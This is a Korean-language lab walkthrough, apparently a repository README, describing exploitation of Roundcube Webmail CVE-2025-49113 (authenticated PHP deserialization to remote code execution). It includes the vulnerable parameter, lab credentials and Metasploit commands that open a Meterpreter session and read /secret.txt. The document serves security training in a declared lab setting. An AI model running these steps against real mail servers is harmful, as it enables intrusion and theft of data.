Roundcube Webmail CVE-2025-49113(인증된 PHP 객체 역직렬화 → RCE)을 활용해 /secret.txt를 읽는 실습형 익스플로잇 랩
면책 고지: 교육 목적으로만 사용
이 저장소는 제가 통제된 랩 환경에서 Roundcube Webmail CVE-2025-49113을 단계별로 익스플로잇하여 /secret.txt에 저장된 비밀을 획득한 과정을 기록합니다.
⚠️ 면책 조항
모든 작업은 테스트가 승인된 랩/교육 환경에서 수행되었습니다.
소유하거나 관리하지 않는 시스템에는 이러한 기법을 사용하지 마십시오.
Roundcube Webmail은 IMAP을 통해 사서함에 연결하고 SMTP를 통해 메일을 전송하는 브라우저 기반 오픈소스 PHP 이메일 클라이언트입니다. 일반적으로 Apache 또는 Nginx에서 MySQL/PostgreSQL/SQLite와 함께 실행되며 공유 호스팅 환경에서 널리 사용됩니다.
취약점 – CVE-2025-49113
1.6.10까지의 모든 Roundcube 버전(및 1.5.10 이전의 1.5.x 버전)에는 program/actions/settings/upload.php에 치명적인 버그가 있습니다. _from 매개변수가 제대로 검증되지 않아 인증된 공격자가 안전하지 않은 PHP 객체 역직렬화를 트리거하고 웹 서버 권한으로 원격 코드 실행을 달성할 수 있습니다.
랩 자격 증명:
roundcubercpass목표:
/secret.txt파일 안에 있는 비밀은 무엇일까요?
nmapmsfconsole (Metasploit 6)172.20.2.57의 Roundcube Webmailexploit/multi/http/roundcube_auth_rce_cve_2025_49113명령어: nmap -sV Target Machine
msf6 > use exploit/multi/http/roundcube_auth_rce_cve_2025_49113 msf6 exploit(multi/http/roundcube_auth_rce_cve_2025_49113) > set RHOSTS Target Machine msf6 exploit(multi/http/roundcube_auth_rce_cve_2025_49113) > set LHOST Kali Machine msf6 exploit(multi/http/roundcube_auth_rce_cve_2025_49113) > set USERNAME Target Machine msf6 exploit(multi/http/roundcube_auth_rce_cve_2025_49113) > set PASSWORD Target Machine
meterpreter > cat /secret.txt